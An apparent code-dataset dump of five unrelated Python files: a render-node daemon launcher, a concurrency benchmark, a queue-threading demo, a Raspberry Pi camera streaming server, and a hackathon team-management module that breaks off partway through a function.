source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
multi_nodes.py
|
#!/usr/bin/env python
import os
import sys
import time
import logging
from multiprocessing import Process, current_process
from plow.rndaemon.main import RndFormatter
from plow.rndaemon import conf
class RndProcessHandler(object):
def runTask(self, rtc):
logger = logging.getLogger(__name__)
logger.info("Server asked node to run a task: %r", rtc)
def killRunningTask(self, procId, reason):
logger = logging.getLogger(__name__)
logger.info("Server asked node to kill a task on proc %r", procId)
def getRunningTasks(self):
logger = logging.getLogger(__name__)
logger.info("Server asked node to report running tasks")
return []
def reboot(self, now=False):
logger = logging.getLogger(__name__)
logger.info("Server asked node to reboot (now = %r)", now)
def start(port):
from plow.rndaemon import profile
from plow.rndaemon.profile import test
profile.SystemProfiler = test.SystemProfiler
from plow.rndaemon.server import get_server
from plow.rndaemon.rpc import RndNodeApi
logger = logging.getLogger(current_process().name)
logger.info("Staring Render Node Daemon on TCP port %d", port)
server = get_server(RndNodeApi, RndProcessHandler(), port)
try:
server.serve()
except KeyboardInterrupt:
sys.exit(2)
if __name__ == "__main__":
logger = logging.getLogger()
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = RndFormatter(datefmt='%Y-%m-%d %H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.setLevel(logging.DEBUG)
import argparse
parser = argparse.ArgumentParser(
description='Start the Plow Render Node Daemon',
usage='%(prog)s [opts]',
)
parser.add_argument("-num", type=int, default=1,
help="Number of rndaemon instances to start")
parser.add_argument("-refresh", type=int, default=30,
help="How often, in seconds, to ping in updated data for each node")
args = parser.parse_args()
daemons = []
num = max(args.num, 1)
conf.NETWORK_PING_INTERVAL = max(args.refresh, 1)
logger.info("Starting %d rndaemon processes...", num)
for i in xrange(num):
name = 'rndaemon-instance-{0}'.format(i)
p = Process(target=start, args=(conf.NETWORK_PORT + i,), name=name)
p.daemon = True
p.start()
daemons.append(p)
while True:
try:
time.sleep(.5)
except KeyboardInterrupt:
for d in daemons:
d.terminate()
d.join()
break
sys.exit(0)
|
benchmark02_int_arithmetic.py
|
#!/usr/bin/python
import os
import sys
import threading
import time
from multiprocessing import Pool
sys.path.append("./benchmark_cython_module")
import benchmark_cython_module
NUM_ITERATIONS = 1000000
NUM_TASKS = 50
def my_function1(in_value, out_value):
out_value[in_value] = sum([(((z * z) + (z * z * 9)) / 5) + in_value
for z in xrange(NUM_ITERATIONS)])
def my_function2(in_value):
return sum([(((z * z) + (z * z * 9)) / 5) + in_value
for z in xrange(NUM_ITERATIONS)])
if __name__ == '__main__':
print ("Running: %s" % os.path.basename(__file__))
results = {}
jobs = [threading.Thread(target=my_function1, kwargs=dict(in_value=i, out_value=results))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using threading): %f\n" % execution_time)
# print ("Results: %s\n" % results.values())
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(my_function2, [p]) for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using multiprocessing.Pool): %f\n" % execution_time)
# print ("Results: %s\n" % [x.get() for x in results])
results = {}
jobs = [threading.Thread(target=benchmark_cython_module.benchmark02_function1,
kwargs=dict(in_value=i, out_value=results, num_iters=NUM_ITERATIONS))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using threading and cython module): %f\n" % execution_time)
# print ("Results: %s\n" % results.values())
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(benchmark_cython_module.benchmark02_function2, [p, NUM_ITERATIONS])
for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(using multiprocessing.Pool and cython module): %f\n" % execution_time)
# print ("Results: %s\n" % [x.get() for x in results])
|
6-queued-threads.py
|
from threading import Thread
import time
import random
import queue
counter = 0
job_queue = queue.Queue()
counter_queue = queue.Queue()
def increment_manager():
global counter
while True:
increment = counter_queue.get() # this waits until an item is available and locks the queue
time.sleep(random.random())
old_counter = counter
time.sleep(random.random())
counter = old_counter + increment
time.sleep(random.random())
job_queue.put((f'New counter value {counter}', '------------'))
time.sleep(random.random())
counter_queue.task_done() # this unlocks the queue
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=increment_manager, daemon=True).start()
def printer_manager():
while True:
for line in job_queue.get():
time.sleep(random.random())
print(line)
job_queue.task_done()
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=printer_manager, daemon=True).start()
def increment_counter():
counter_queue.put(1)
time.sleep(random.random())
worker_threads = [Thread(target=increment_counter) for thread in range(10)]
for thread in worker_threads:
time.sleep(random.random())
thread.start()
for thread in worker_threads:
thread.join() # wait for it to finish
counter_queue.join() # wait for counter_queue to be empty
job_queue.join() # wait for job_queue to be empty
|
server.py
|
#!/usr/bin/env python
import sys
import io
import os
import shutil
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = False
HFLIP = False
###########################################
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
return
elif self.path == '/jsmpeg.min.js':
content_type = 'application/javascript'
content = self.server.jsmpeg_content
elif self.path == '/index.html':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.index_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
class StreamingHttpServer(HTTPServer):
def __init__(self):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
with io.open('index.html', 'r') as f:
self.index_template = f.read()
with io.open('jsmpeg.min.js', 'r') as f:
self.jsmpeg_content = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpegts',
'-b', '800k',
'-codec:v', 'mpeg1video',
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.websocket_server.manager.broadcast(buf, binary=True)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(
protocols=['null'],
handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
team_manager.py
|
# -*- coding: utf-8 -*-
"""
This file is covered by the LICENSING file in the root of this project.
"""
import sys
from werkzeug.exceptions import Forbidden
sys.path.append("..")
import uuid
import time
from flask import g
import threading
from mongoengine import Q, ValidationError
from os.path import realpath, abspath, dirname
from hackathon import Component, RequiredFeature
from hackathon.hmongo.models import Team, TeamMember, TeamScore, TeamWork, Hackathon, UserHackathon, to_dic
from hackathon.hackathon_response import not_found, bad_request, precondition_failed, ok, forbidden
from hackathon.constants import TEAM_MEMBER_STATUS, TEAM_SHOW_TYPE, HACK_USER_TYPE, HACKATHON_CONFIG
__all__ = ["TeamManager"]
hack_manager = RequiredFeature("hackathon_manager")
class TeamManager(Component):
"""Component to manage hackathon teams"""
user_manager = RequiredFeature("user_manager")
admin_manager = RequiredFeature("admin_manager")
register_manager = RequiredFeature("register_manager")
hackathon_template_manager = RequiredFeature("hackathon_template_manager")
def get_team_by_id(self, team_id):
team = self.__get_team_by_id(team_id)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
# TODO: refine: dereference member users is not necessary
return self.__team_detail(team, user)
else:
return not_found()
def get_my_current_team(self, hackathon, user):
team = self.__get_valid_team_by_user(user.id, hackathon.id)
return self.__team_detail(team, user) if team else not_found("user has no team",
friendly_message="组队异常,请联系管理员!")
def get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team_name: str | unicode
:param team_name: name of the team
:rtype: dict
:return: team's information as a dict if team is found otherwise not_found()
"""
team = self.__get_team_by_name(hackathon_id, team_name)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
return self.__team_detail(team, user)
else:
return not_found("no such team")
def get_team_members(self, team_id):
"""Get team member list of specific team
:rtype: dict
:return: team's information and team's members list if team is found otherwise not_found()
"""
try:
team = Team.objects(id=team_id).first()
except ValidationError:
return None
if not team:
return None
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
return [sub(t) for t in team.members]
def get_hackathon_team_list(self, hackathon_id, name=None, number=None):
"""Get the team list of selected hackathon
:type hackathon_id: string or object_id
:param hackathon_id: hackathon id
:type name: str|unicode
:param name: name of team. optional
:type number: int
:param number: querying condition, return number of teams
:rtype: list
:return: a list of team filter by name and number on selected hackathon
"""
query = Q(hackathon=hackathon_id)
if name is not None:
query &= Q(name__icontains=name)
try:
teams = Team.objects(query).order_by('name')[:number]
except ValidationError:
return []
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
def get_team(team):
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
teamDic['works'] = teamDic.get('works', '')
[teamDic.pop(key, None) for key in
['assets', 'azure_keys', 'scores', 'templates', 'hackathon']]
teamDic["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
teamDic["members"] = [sub(t) for t in team.members]
return teamDic
return [get_team(x) for x in teams]
def create_default_team(self, hackathon, user):
"""Create a default new team for user after registration.
Use user name as team name by default. Append user id in case user name is duplicate
"""
user_team = self.__get_valid_team_by_user(user.id, hackathon.id)
if user_team:
self.log.debug("fail to create team since user is already in some team.")
return precondition_failed("you must leave the current team first")
team_name = self.__generate_team_name(hackathon, user)
team_member = TeamMember(join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.APPROVED,
user=user)
team = Team(name=team_name,
leader=user,
logo=user.avatar_url,
hackathon=hackathon,
members=[team_member])
team.save()
return team.dic()
def update_team(self, kwargs):
"""Update existing team information
:type kwargs: dict
:param kwargs: a dict to store update information for team
:rtype: dict
:return: updated team information in a dict
"""
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
# avoid duplicate team with same names
if "name" in kwargs and kwargs["name"] != team.name:
if self.__get_team_by_name(g.hackathon.id, kwargs["name"]):
return precondition_failed("team with the same name exists already")
self.__validate_team_permission(g.hackathon.id, team, g.user)
# hackathon.modify(**update_items)
# team.name = kwargs.get("name", team.name)
# team.description = kwargs.get("description", team.description)
# team.logo = kwargs.get("logo", team.logo)
kwargs.pop('id', None) # id should not be included
team.modify(**kwargs)
team.update_time = self.util.get_now()
team.save()
if "dev_plan" in kwargs and kwargs["dev_plan"] and not kwargs["dev_plan"] == "" \
and team.hackathon.config.get(HACKATHON_CONFIG.DEV_PLAN_REQUIRED, False):
t = threading.Thread(target=self.__email_notify_dev_plan_submitted, args=(team,))
t.setDaemon(True)
t.start()
return self.__team_detail(team)
def dismiss_team(self, operator, team_id):
"""Dismiss a team by team leader or hackathon admin
:rtype: bool
:return: if dismiss success, return ok. if not ,return bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return ok()
hackathon = team.hackathon
self.__validate_team_permission(hackathon.id, team, operator)
members = team.members
member_users = [m.user for m in members]
# TODO: transcation?
team.delete()
for u in member_users:
self.create_default_team(hackathon, u)
return ok()
def quit_team_forcedly(self, team, user):
"""
The operator(admin or superadmin) forces a user(team leader or other members) to quit a team.
If the user is the only member of the team, the team will be deleted.
Else if the user is the leader of a team with several members, the team will be decomposed into several
new teams.
Else if the user is not the leader of a team with several members, just the user quits the team.
:rtype: bool
:return: if dismiss success, return ok. if not ,return bad request.
"""
# here we don't check whether the operator has the permission,
if not team.members or len(team.members) == 0:
self.log.warn("this team doesn't have any members")
return ok()
member_users = [m.user for m in team.members if m.status == TEAM_MEMBER_STATUS.APPROVED]
num_team_members = len(member_users)
hackathon = team.hackathon
if num_team_members > 1:
if team.leader == user:
team.delete()
for u in member_users:
if u.id != user.id:
self.create_default_team(hackathon, u)
else:
Team.objects(id=team.id).update_one(pull__members__user=user)
else:
# num_team_members == 1
team.delete()
return ok()
def join_team(self, user, team_id):
"""Join a team will create a record on user_team_rel table which status will be 0.
:type user: User
:rtype: dict
:return: if user already joined team or team not exist, return bad request. Else, return a dict of joined
details.
"""
if Team.objects(id=team_id, members__user=user.id).count():
return ok("You already joined this team.")
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
cur_team = self.__get_valid_team_by_user(user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
if not self.register_manager.is_user_registered(user.id, team.hackathon):
return precondition_failed("user not registerd")
mem = TeamMember(
join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.INIT,
user=user)
team.members.append(mem)
team.save()
return to_dic(mem)
def update_team_member_status(self, operator, team_id, user_id, status):
""" update user's status on selected team. if current user doesn't have permission, return bad request.
Else, update user's status
:type status: int
:param status: the status of the team member, see TEAM_MEMBER_STATUS in constants.py
:rtype: bool
:return: if update success, return ok. if not , return bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
mem = [x for x in team.members if str(x.user.id) == user_id]
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
# #NOTE1# we have to re-check this here
# because of this situation:
# A is in a single-person team TeamA, and request join TeamB
# after that, C join TeamA and now TeamA has two members,
# this is not allowed when status == TEAM_MEMBER_STATUS.APPROVED
cur_team = self.__get_valid_team_by_user(mem.user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
self.__validate_team_permission(team.hackathon.id, team, operator)
if mem.user.id == team.leader.id:
return precondition_failed("cannot update status of team leader")
if status == TEAM_MEMBER_STATUS.APPROVED:
# disable previous team first
# NOTE:
# Do we also have to delete status that is not TEAM_MEMBER_STATUS.APPROVED?
# i.e., if A request join both TeamB and TeamC, TeamC approve join first, then TeamB approved,
# this will cause A leave TeamB and join TeamC.
# is this the desired behaviour?
Team.objects(hackathon=team.hackathon.id).update(__raw__={
"$pull": {
"members": {
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}}})
# because only team leader with single team can make join request
# so we don't have to make default team for other members in this team
# we make the check in #NOTE1# so this is always true
Team.objects(hackathon=team.hackathon.id, leader=mem.user.id).delete()
mem.status = TEAM_MEMBER_STATUS.APPROVED
mem.update_time = self.util.get_now()
team.save()
return ok("approved")
if status == TEAM_MEMBER_STATUS.DENIED:
user = mem.user
hackathon = team.hackathon
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok("Your request has been denied, please rejoin another team.")
def kick_or_leave(self, operator, team_id, user_id):
try:
team = Team.objects(id=team_id, members__user=user_id).first()
except ValidationError:
return not_found()
if not team:
return not_found()
mem = [x for x in team.members if str(x.user.id) == user_id]
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
hackathon = team.hackathon
user = mem.user
if str(team.leader.id) == user_id: # if the user to be leaved or kicked is team leader
return precondition_failed("leader cannot leave team")
if str(operator.id) == user_id: # leave team
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
else: # kick somebody else
self.__validate_team_permission(hackathon.id, team, operator)
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok()
def add_template_for_team(self, args):
"""Add template to team of the current user by template name
template_id must be included in args. Current login user must have a team and HE must be its leader
"""
if "template_id" not in args:
return bad_request("template id invalid")
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.add_template_to_hackathon(args["template_id"])
def delete_template_from_team(self, template_id):
"""Delete template from current user's team
Team should exist and current login user must be the leader
"""
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.delete_template_from_hackathon(template_id)
def get_team_by_user_and_hackathon(self, user, hackathon):
team = Team.objects(hackathon=hackathon, members__user=user).first()
return team
def score_team(self, judge, ctx):
team = self.__get_team_by_id(ctx.team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, judge.id):
return forbidden()
score = [x for x in team.scores if x.judge.id == judge.id]
assert len(score) < 2
if score:
score = score[0]
score.score = ctx.score
score.reason = ctx.get("reason")
score.update_time = self.util.get_now()
else:
score = TeamScore(
score=ctx.score,
judge=judge,
reason=ctx.get("reason"))
team.scores.append(score)
team.save()
return self.__response_get_score(judge, team.scores)
def get_score(self, user, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id):
return {}
return self.__response_get_score(user, team.scores)
def __response_get_score(self, user, scores):
resp = {
"all": [to_dic(s) for s in scores]}
my = [sc for sc in scores if sc.judge.id == user.id]
assert len(my) < 2
if my:
resp["my"] = to_dic(my[0])
return resp
def add_team_show(self, user, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found()
self.__validate_team_permission(team.hackathon.id, team, user)
try:
work = TeamWork(
id=uuid.uuid1(),
description=context.get("note"),
type=context.type,
uri=context.uri)
team.works.append(work)
team.save()
except ValidationError as e:
if "uri" in e.message:
return bad_request("`uri` field must be in uri format")
else:
raise e
return to_dic(work)
def delete_team_show(self, user, show_id):
try:
team = Team.objects(works__id=show_id).first()
except (ValidationError, ValueError):
return not_found("wrong id format")
if team:
self.__validate_team_permission(team.hackathon.id, team, user)
for i in range(len(team.works)):
if str(team.works[i].id) == show_id:
team.works.pop(i)
team.save()
break
return ok()
def get_team_show_list(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
return [to_dic(s) for s in team.works]
def get_hackathon_show_list(self, hackathon_id, show_type=None, limit=6):
query = Q(hackathon=hackathon_id)
if show_type is not None:
query &= Q(works__type=int(show_type))
works = []
for team in Team.objects(query).filter(works__1__exists=True).order_by('update_time', '-age')[:limit]:
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
[teamDic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
#
# teamDic['works'] = []
#
# for work in team.works:
# teamDic['works'].append(to_dic(work))
works.append(teamDic)
# works.sort(lambda a, b: int(b["create_time"] - a["create_time"]))
# def proc_work(w):
# w.pop("create_time")
# w["id"] = str(w["id"])
# w["team_id"] = str(w["team_id"])
# w["hackathon_id"] = str(w["hackathon_id"])
# return w
return works
def get_team_show_list_by_user(self, user_id):
teams = Team.objects(members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).all()
def get_team_show_detail(team):
dic = self.__team_detail(team)
dic["hackathon"] = team.hackathon.dic()
return dic
return [get_team_show_detail(team) for team in teams if not len(team.works) == 0]
def get_team_source_code(self, team_id):
try:
team = Team.objects(id=team_id, works__type=TEAM_SHOW_TYPE.SOURCE_CODE)
except ValidationError:
return None
if not team:
return None
return [w for w in team.works if w.type == TEAM_SHOW_TYPE.SOURCE_CODE][0]
def query_team_awards(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
awards = [self.__award_with_detail(r, hackathon=team.hackathon) for r in team.awards]
awards.sort(lambda a, b: b.level - a.level)
return awards
def get_granted_awards(self, hackathon):
awards = []
team_id_with_awards = []
for team in Team.objects(hackathon=hackathon):
awards += team.awards
if not len(team.awards) == 0:
team_id_with_awards.append(team.id)
awards = [self.__award_with_detail(r) for r in awards]
awards.sort(lambda a, b: b["level"] - a["level"])
# find teams who are granted these awards
for award in awards:
award["team"] = []
for team_id in team_id_with_awards:
team = Team.objects(id=team_id).first()
if uuid.UUID(award["id"]) in team.awards:
award["team"].append(team.dic())
# len(awards) is equal to the number of all awards granted, so it's duplicated, remove duplicated items in JS.
return awards
def get_all_granted_awards(self, limit):
teams = Team.objects().all()
teams_with_awards = [team for team in teams if not team.awards == []]
teams_with_awards.sort(key=lambda t: (
t.hackathon.id,
Hackathon.objects(id=t.hackathon.id, awards__id=t.awards[0]).first().awards.get(id=t.awards[0]).level
), reverse=True) # sort by hackathon and then sort by award level.
teams_with_awards = teams_with_awards[0: int(limit)]
return [self.__get_hackathon_and_show_detail(team) for team in teams_with_awards]
def grant_award_to_team(self, hackathon, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found("team not found")
award = [a for a in hackathon.awards if str(a.id) == context.award_id]
assert len(award) < 2
if not award:
return not_found("award not found")
award = award[0]
if team.hackathon.id != hackathon.id:
return precondition_failed("hackathon doesn't match")
team_award = [a for a in team.awards if str(a) == context.award_id]
assert len(team_award) < 2
if not team_award:
team.awards.append(uuid.UUID(context.award_id))
team.save()
return self.__award_with_detail(context.award_id)
def cancel_team_award(self, hackathon, team_id, award_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
for award in team.awards:
if str(award) == award_id:
team.awards.remove(award)
team.save()
break
return ok()
def send_email_azure(self, kwargs):
# team information
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
azure = team.azure
if not azure.strip():
if Azure.objects(status="0").count() == 0:
return ok("请联系管理员.")
azure_info = Azure.objects(status="0").first()
else:
azure_info = Azure.objects(account=azure).first()
if not azure_info:
return ok("请联系管理员!")
primary_emails = []
for i in range(0, len(team.members)):
mem = team.members[i]
resp = self.user_manager.user_display_info(mem.user)
primary_emails.append(resp['emails'][0]['email'])
Azure.objects(account=azure_info.account).update_one(status="1")
Team.objects(id=team.id).update_one(azure=azure_info.account)
sender = ''
email_title = ''
email_content = ''
return self.util.send_emails(sender, primary_emails, email_title, email_content)
def __init__(self):
pass
def __award_with_detail(self, team_award, hackathon=None):
if not hackathon:
hackathon = g.hackathon
try:
award = [a for a in hackathon.awards if str(a.id) == str(team_award)][0]
except IndexError:
return None
return to_dic(award)
def __team_detail(self, team, user=None):
resp = team.dic()
resp["leader"] = self.user_manager.user_display_info(team.leader)
resp["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
# all team action not allowed if frozen
resp["is_frozen"] = False
for i in range(0, len(team.members)):
mem = team.members[i]
resp["members"][i]["user"] = self.user_manager.user_display_info(mem.user)
if user:
resp["is_admin"] = self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id)
resp["is_leader"] = team.leader == user
rel = team.members.filter(user=user)
resp["is_member"] = True if not rel == [] else False
return resp
def __generate_team_name(self, hackathon, user):
"""Generate a default team name by user name. It can be updated later by team leader"""
team_name = user.name
if Team.objects(hackathon=hackathon, name=team_name).first():
team_name = "%s (%s)" % (user.name, user.id)
return team_name
def __get_user_teams(self, user_id):
"""Get all teams of specific and related hackathon display info
:type user_id: int
:param user_id: User id to get teams. Cannot be None
:rtype: list
:return list of all teams as well as hackathon info
"""
return Team.objects(members__user=user_id).all()
def __get_team_by_id(self, team_id):
"""Get team by its primary key"""
try:
return Team.objects(id=team_id).first()
except ValidationError:
return None
def __get_valid_team_by_user(self, user_id, hackathon_id):
"""Get valid Team(Mongo-document) by user and hackathon
"valid" means user is approved. There might be other records where status=Init
Since foreign keys are defined in Team, one can access team or user through the return result directly
:rtype: Team
:return instance of Team
"""
return Team.objects(
hackathon=hackathon_id,
members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).first()
def __get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: hackathon id for the team
:type team_name: str|unicode
:param team_name: name of the team
:rtype: Team
:return: instance of Team if team found otherwise None
"""
try:
return Team.objects(hackathon=hackathon_id, name=team_name).first()
except ValidationError:
return None
def __validate_team_permission(self, hackathon_id, team, user):
"""Validate current login user whether has proper right on specific team.
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team: Team
:param team: team to be checked
:type user: User
:param user: current login user
:raise: Forbidden if user is neither team leader, hackathon admin nor super admin
"""
self.log.debug(
"validate team permission on hackathon %s and team %s for user %s" % (hackathon_id, team.name, user.id))
# check if team leader
if team.leader.id != user.id:
# check if hackathon admin
if not self.admin_manager.is_hackathon_admin(hackathon_id, user.id):
# super permission is already checked in admin_manager.is_hackathon_admin
self.log.debug("Access denied for user [%s]%s trying to access team '%s' of hackathon %s " %
(user.id, user.name, team, hackathon_id))
raise Forbidden(description="You don't have permission on team '%s'" % team.name)
return
def __get_hackathon_and_show_detail(self, team):
team_dic = team.dic()
team_dic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
team_dic['cover'] = team_dic.get('cover', '')
team_dic['project_name'] = team_dic.get('project_name', '')
team_dic['dev_plan'] = team_dic.get('dev_plan', '')
[team_dic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
team_dic["hackathon"] = hack_manager.get_hackathon_detail(team.hackathon)
return team_dic
def __email_notify_dev_plan_submitted(self, team):
# send emails to all admins of this hackathon when one team dev plan is submitted.
admins = UserHackathon.objects(hackathon=team.hackathon, role=HACK_USER_TYPE.ADMIN).distinct("user")
email_title = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.title", None)
file_name = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.default_file_name", None)
sender = self.util.safe_get_config("email.default_sender", "")
# todo remove receivers_forced
receivers_forced = self.util.safe_get_config("email.receivers_forced", [])
try:
if email_title and file_name:
path = abspath("%s/.." % dirname(realpath(__file__)))
f = open(path + "/resources/email/" + file_name, "r")
email_content = f.read()
email_title = email_title % (team.name.encode("utf-8"))
email_content = email_content.replace("{{team_name}}", team.name.encode("utf-8"))
email_content = email_content.replace("{{team_id}}", str(team.id))
email_content = email_content.replace("{{hackathon_name}}", team.hackathon.name.encode("utf-8"))
f.close()
else:
self.log.error("send email_notification (dev_plan_submitted_event) fails: please check the config")
return False
except Exception as e:
self.log.error(e)
return False
# isNotified: whether at least one admin has been notified by emails.
isNotified = False
for admin in admins:
isSent = False
